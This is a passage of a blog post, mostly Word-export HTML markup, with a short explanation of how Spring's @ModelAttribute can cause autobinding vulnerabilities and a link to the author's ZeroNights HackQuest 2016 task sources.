<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<u><span lang="EN-US" style="mso-ansi-language: EN-US;">If you are
not familiar with them or don't know spring at all, don't panic, because it
will be clearer with further examples :)</span></u></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">What do the
examples 2-4 have in common? They are all somehow related to <span style="mso-spacerun: yes;"> </span>"passing" data between methods.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">One of the
ways to get data that was passed to the method is to use @ModelAttribute on a
method argument (look at 1). However, it could lead to autobinding vuln. Why?
Because @ModelAttribute is pretty “smart”. Let's look at a full description of
it.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<i><span lang="EN-US" style="mso-ansi-language: EN-US;">"An
@ModelAttribute on a method argument indicates the argument should be retrieved
from the model. If not present in the model, the argument should be
instantiated first and then added to the model. Once present in the model, the
argument's fields should be populated from all request parameters that have
matching names."</span></i></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">So, first,
@ModelAttribute retrieves an object from the model (or somewhere else) and then
it populates the object with a user request. Therefore, a coder expects trusted
data (the object) from the model, but an attacker can change it by just sending
a specially crafted request.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">I've made 2
tasks for ZN HQ, and both of them contain variations of autobinding vulns.
Let's have a look <span style="mso-spacerun: yes;"> </span>at what's going on
there.</span></div>
<br />
Sources of the tasks - <a href="https://github.com/GrrrDog/ZeroNights-HackQuest-2016" target="_blank">https://github.com/GrrrDog/ZeroNights-HackQuest-2016</a><br />
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
